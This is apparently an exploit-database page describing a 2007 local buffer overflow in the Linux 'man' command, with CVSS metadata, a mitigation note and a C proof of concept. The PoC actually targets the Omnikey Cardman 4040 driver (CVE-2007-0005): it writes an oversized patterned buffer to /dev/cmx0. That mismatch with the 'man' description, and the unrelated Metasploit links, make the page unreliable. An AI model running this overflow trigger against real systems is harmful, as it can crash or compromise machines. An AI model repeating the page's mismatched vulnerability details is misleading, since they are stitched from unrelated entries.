header-logo
Suggest Exploit
vendor:
man
by:
Daniel Roethlisberger
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: man
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: CVE-2007-0005
CPE: a:man:man
Metasploit: https://www.rapid7.com/db/vulnerabilities/vmsa-2010-0005-cve-2009-3885/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2010-0602/https://www.rapid7.com/db/vulnerabilities/vmsa-2010-0005-cve-2007-5333/https://www.rapid7.com/db/vulnerabilities/vmsa-2010-0005-cve-2007-6286/https://www.rapid7.com/db/vulnerabilities/linuxrpm-CESA-2008-0006/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0007/https://www.rapid7.com/db/vulnerabilities/linuxrpm-CESA-2008-0004/https://www.rapid7.com/db/vulnerabilities/linuxrpm-CESA-2008-0008/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0004/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0006/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0008/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0009/https://www.rapid7.com/db/vulnerabilities/vmsa-2010-0005-cve-2007-5342/https://www.rapid7.com/db/vulnerabilities/vmsa-2008-0005-cve-2007-5618-player/https://www.rapid7.com/db/vulnerabilities/vmsa-2008-0005-cve-2007-5618-workstation/https://www.rapid7.com/db/vulnerabilities/vmsa-2010-0005-cve-2007-5461/https://www.rapid7.com/db/vulnerabilities/vmsa-2008-0005-cve-2007-5269-player/https://www.rapid7.com/db/vulnerabilities/vmsa-2008-0005-cve-2007-5269-workstation/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0005/https://www.rapid7.com/db/vulnerabilities/linuxrpm-CESA-2008-0005/https://www.rapid7.com/db/?q=CVE-2007-0005&type=&page=2https://www.rapid7.com/db/?q=CVE-2007-0005&type=&page=2
Other Scripts:
Platforms Tested: Linux
2007

Local Buffer Overflow in ‘man’ command

The 'man' command is prone to a local buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before using it in a memory copy operation. Exploiting this issue allows attackers to execute malicious machine code with the privileges of the 'man' utility. This can result in the compromise of affected computers. Failed exploit attempts will likely result in denial-of-service conditions.

Mitigation:

Apply the necessary patches or updates provided by the vendor. Avoid running the 'man' command with elevated privileges.
Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/23355/info

The 'man' command is prone to a local buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before using it in a memory copy operation.

NOTE: Presumably, this issue is exploitable only when 'man' has been installed setuid.

Exploiting this issue allows attackers to execute malicious machine code with the privileges of the 'man' utility. This can result in the compromise of affected computers. Failed exploit attempts will likely result in denial-of-service conditions. 

PoC Code:
---------
/*
 * Linux Omnikey Cardman 4040 driver buffer overflow (CVE-2007-0005)
 * Copyright (C) Daniel Roethlisberger <daniel.roethlisberger@csnc.ch>
 * Compass Security Network Computing AG, Rapperswil, Switzerland.
 * All rights reserved.
 * http://www.csnc.ch/
 */

#include<sys/stat.h>
#include<fcntl.h>
#include<unistd.h>
#include<stdlib.h>
#include<stdio.h>
#include<string.h>
#include<errno.h>

int main(int argc, char *argv[]) {
    int fd, i, n;
    char buf[8192];

    /*
     * 0  1  2  3  4  5  6  7  8  9  a  b  c  d  e  f  ...
     * 00 01 00 02 00 03 00 04 00 05 00 06 00 07 00 08 ...
     */
    for (i = 0; i < sizeof(buf); i += 2) {
        buf[i]   = (char)(((i/2) & 0xFF00) >> 8);
        buf[i+1] = (char) ((i/2) & 0x00FF);
    }

    if ((fd = open("/dev/cmx0", O_RDWR)) < 0) {
        printf("Error: open() => %s\n", strerror(errno));
        exit(errno);
    }
    if ((n = write(fd, buf, sizeof(buf))) < 0) {
        printf("Error: write() => %s\n", strerror(errno));
        exit(errno);
    }
    printf("%d of %d bytes written\n", n, sizeof(buf));
    exit(0);
}

Navigation

Suggest Exploit

Services By CQR